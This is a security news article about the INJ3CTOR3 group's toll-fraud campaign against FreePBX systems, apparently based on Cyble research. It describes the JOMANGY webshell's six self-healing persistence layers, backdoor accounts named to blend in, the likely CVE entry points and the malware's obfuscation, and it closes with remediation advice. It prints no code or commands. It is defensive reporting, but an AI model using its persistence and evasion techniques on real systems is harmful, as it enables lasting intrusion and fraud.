INJ3CTOR3 Group Deploys Self-Healing JOMANGY Webshell in Toll Fraud Campaign Against FreePBX Systems
The INJ3CTOR3 hacker group is targeting over 3,000 FreePBX VoIP systems with a novel PHP webshell called JOMANGY that uses six self-healing persistence layers to maintain access for toll fraud.
The INJ3CTOR3 hacker group has launched an active campaign against internet-exposed FreePBX VoIP systems, deploying a newly discovered PHP webshell called JOMANGY that employs six separate persistence layers to stay embedded on compromised servers. The operation targets over 3,000 IP addresses for toll fraud, routing calls through compromised systems at the victims' expense. FreePBX, an open-source interface for managing phone systems built on Asterisk software, handles real carrier accounts with SIP trunks that can originate actual phone calls, making it an attractive target for attackers seeking to route calls through premium-rate numbers they control.
Analysts at Cyble (CRIL) identified the campaign and tied it to INJ3CTOR3 with high confidence, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026. The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave, and by May 2026, more than 700 of those systems remained infected despite five months of public disclosure, highlighting how difficult these infections are to clear.
Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module. Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself.
What sets this campaign apart is the engineering of its persistence. The six channels are not independent backups sitting in parallel; each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes. The first channel polls the attacker's command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper. The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root, backed by two separate restore loops.
The fourth channel is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack. The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels.
The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL. Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find. JOMANGY had no prior public documentation before this analysis and uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners. At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero.
Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes. The campaign underscores the growing sophistication of financially motivated threat actors targeting VoIP infrastructure, where the combination of self-healing malware and persistent backdoor accounts makes remediation far more complex than simply applying patches.